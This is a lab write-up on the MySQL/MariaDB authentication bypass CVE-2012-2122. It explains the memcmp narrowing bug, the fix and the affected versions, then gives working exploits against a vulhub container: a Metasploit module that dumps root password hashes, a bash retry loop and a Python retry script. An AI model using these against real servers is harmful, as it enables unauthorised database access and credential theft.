MySQL authentication bypass vulnerability (CVE-2012-2122)

Vulnerability overview

When a client connects to MariaDB/MySQL, the hash derived from the password it supplies is compared with the hash the server expects. Because the result of that comparison was handled incorrectly, the server could treat the two as equal even when memcmp() returned a non-zero value.
The root cause is a narrowing conversion: check_scramble() returned memcmp()'s int result through my_bool, which is a plain char, so only the low 8 bits survived. That is harmless as long as memcmp() only returns values in the -128 to 127 (signed char) range, which a byte-at-a-time implementation does, but the SSE-optimized memcmp() in some builds of the GNU C library on Linux returns wider values, and whenever the low byte of a non-zero result happens to be 0 the mismatch is truncated to 0, which the caller reads as "passwords match". The flaw is therefore only exploitable against servers built with such a memcmp(); the official Oracle binaries were reported unaffected, while several 64-bit Linux distribution builds were. On an affected build each login attempt with a wrong password succeeds with probability about 1 in 256, so a few hundred attempts are normally enough.
Affected versions: all MariaDB and MySQL releases up to 5.1.61, 5.2.11, 5.3.5 and 5.5.22 contain the flaw.
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not affected.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not affected.
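To make the narrowing concrete, here is an added example (written for this page, not MySQL's or glibc's source) that models check_scramble() before and after the fix. wide_memcmp() is a constructed stand-in for an optimized memcmp() whose return value is not confined to -128..127 (it compares 16-bit lanes and returns the lane difference); the 20-byte buffers stand for the SHA1 stage-2 hashes the server compares. The program shows one crafted mismatch that the vulnerable check accepts, then counts how many random wrong hashes each version lets through.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* MySQL's my_bool is a plain char, so returning an int through it keeps only
   the low 8 bits. That narrowing is the whole bug. */
typedef char my_bool;

#define HASH_LEN 20   /* SHA1_HASH_SIZE: length of the stage-2 hash being compared */

/* Constructed stand-in for an optimized memcmp(): compares 16-bit lanes and
   returns the lane difference, so results are NOT confined to -128..127 the
   way a byte-at-a-time memcmp() is. Not glibc's SSE code, only a model of the
   property that broke MySQL. */
static int wide_memcmp(const void *a, const void *b, size_t n)
{
    const uint8_t *pa = a, *pb = b;
    size_t i;
    for (i = 0; i + 1 < n; i += 2) {
        int la = (pa[i] << 8) | pa[i + 1];
        int lb = (pb[i] << 8) | pb[i + 1];
        if (la != lb)
            return la - lb;   /* a multiple of 256 whenever only the high byte differs */
    }
    if (n & 1)
        return (int)pa[n - 1] - (int)pb[n - 1];
    return 0;
}

/* Shape of check_scramble() before the fix: memcmp()'s int is returned
   through my_bool, so 256 or -256 becomes 0, which the caller reads as "match". */
static my_bool check_scramble_vulnerable(const uint8_t *expected, const uint8_t *got)
{
    return wide_memcmp(expected, got, HASH_LEN);
}

/* Shape after the fix: collapse to 0/1 before narrowing (MySQL's test() /
   MY_TEST macro), so every mismatch survives the conversion to char. */
static my_bool check_scramble_fixed(const uint8_t *expected, const uint8_t *got)
{
    return wide_memcmp(expected, got, HASH_LEN) != 0;
}

/* Crafted wrong hash: differs from the expected hash only in byte 0, so the
   first lane difference is -256. Returns the check result (0 = accepted). */
int crafted_check(int use_fixed)
{
    uint8_t expected[HASH_LEN] = {0}, got[HASH_LEN] = {0};
    got[0] = 1;
    return use_fixed ? check_scramble_fixed(expected, got)
                     : check_scramble_vulnerable(expected, got);
}

/* xorshift64: deterministic pseudo-random bytes so runs are reproducible. */
static uint8_t rnd_byte(uint64_t *s)
{
    *s ^= *s << 13; *s ^= *s >> 7; *s ^= *s << 17;
    return (uint8_t)(*s >> 56);
}

/* Model of the online attack: one fixed expected hash (the real password) and
   `attempts` random wrong hashes (what wrong passwords hash to under fresh
   scrambles). Returns how many wrong hashes the chosen check accepted. */
int count_bypasses(int attempts, uint64_t seed, int use_fixed)
{
    uint8_t expected[HASH_LEN], got[HASH_LEN];
    uint64_t s = seed ? seed : 1;
    int accepted = 0, n, i;
    for (i = 0; i < HASH_LEN; i++) expected[i] = rnd_byte(&s);
    for (n = 0; n < attempts; n++) {
        for (i = 0; i < HASH_LEN; i++) got[i] = rnd_byte(&s);
        my_bool r = use_fixed ? check_scramble_fixed(expected, got)
                              : check_scramble_vulnerable(expected, got);
        if (r == 0) accepted++;
    }
    return accepted;
}

int main(void)
{
    printf("crafted hash, vulnerable check: %d (0 = login accepted)\n", crafted_check(0));
    printf("crafted hash, fixed check:      %d\n", crafted_check(1));
    printf("100000 wrong passwords, vulnerable: %d accepted (about 1 in 256)\n",
           count_bypasses(100000, 42, 0));
    printf("100000 wrong passwords, fixed:      %d accepted\n",
           count_bypasses(100000, 42, 1));
    return 0;
}
```

The 1-in-256 figure falls out of the model: a random mismatch is accepted exactly when the first differing lane differs only in its high byte, so its low byte, the only part my_bool keeps, is zero.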

Environment setup

The environment is the ready-made vulhub Docker image.
Configuration: mysql (version 5.5.23), credentials root/123456. The attack needs an account that is allowed to connect from the attacking host (the Metasploit module checks this first), but it does not need that account's password.

Vulnerability verification

metasploit

msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set USERNAME root
USERNAME => root
msf auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set RHOSTS 192.168.31.23
RHOSTS => 192.168.31.23
msf auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run
[+] 192.168.31.23:3306    - 192.168.31.23:3306 The server allows logins, proceeding with bypass test
[+] 192.168.31.23:3306    - 192.168.31.23:3306 Successfully bypassed authentication after 64 attempts. URI: mysql://root:ZoSnI@192.168.31.23:3306
[+] 192.168.31.23:3306    - 192.168.31.23:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
[+] 192.168.31.23:3306    - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306    - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306    - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306    - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306    - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306    - 192.168.31.23:3306 Hash Table has been saved: /root/.msf4/loot/20190714220813_default_192.168.31.23_mysql.hashes_963184.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

bash
for i in `seq 1 1000`; do mysql -u root --password=bad -h IP 2>/dev/null; done

root@kali:~# for i in `seq 1 1000`; do mysql -u root --password=bad -h 192.168.31.23 2>/dev/null; done
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 6065
Server version: 5.5.23 Source distribution

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| test               |
+--------------------+
4 rows in set (0.00 sec)

MySQL [(none)]> 

python
Code

#!/usr/bin/python
# a.py
import subprocess

# Keep reconnecting with a wrong password; on a vulnerable build roughly one
# attempt in 256 is accepted. On success the interactive mysql client takes
# over the terminal; the loop resumes when you quit it, so stop the script
# with Ctrl-C. Replace IP with the target host.
while 1:
    subprocess.Popen("mysql -u root mysql -h IP --password=baah", shell=True).wait()

Output

root@kali:~# python a.py 
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
......
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 8064
Server version: 5.5.23 Source distribution

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [mysql]> 

References:
https://www.freebuf.com/vuls/3815.html
https://www.jianshu.com/p/909bfe51c468
